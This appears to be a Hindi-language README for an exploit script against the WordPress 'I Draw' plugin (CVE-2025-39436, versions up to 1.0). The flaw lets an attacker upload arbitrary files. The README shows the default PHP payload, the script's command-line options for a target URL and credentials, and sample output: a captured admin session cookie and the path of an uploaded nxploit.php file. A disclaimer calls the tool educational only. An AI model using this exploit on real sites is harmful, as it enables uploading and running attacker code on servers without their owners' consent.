
WordPress I Draw Plugin <= 1.0 मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है।
"आई ड्रा" वर्डप्रेस प्लगइन में एक खतरनाक प्रकार के फ़ाइल का असीमित अपलोड भेद्यता मौजूद है। यह शोषण हमलावरों को बिना किसी प्रतिबंध के दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देता है। यह समस्या I Draw संस्करण 1.0 तक को प्रभावित करती है।
शोषण प्लगइन की फ़ाइल अपलोड कार्यक्षमता का उपयोग करके PHP पेलोड निष्पादित करता है। नीचे उपयोग किया गया डिफ़ॉल्ट पेलोड है:
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD
options:
-h, --help Show this help message and exit
-u, --url URL Target website URL
-un, --username USERNAME
Username
-p, --password PASSWORD
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। लेखक इस शोषण के कारण होने वाले किसी भी दुरुपयोग या क्षति की जिम्मेदारी नहीं लेता है। इसका उपयोग अपने जोखिम पर करें।
द्वारा: Nxploited ( Khaled Alenazi )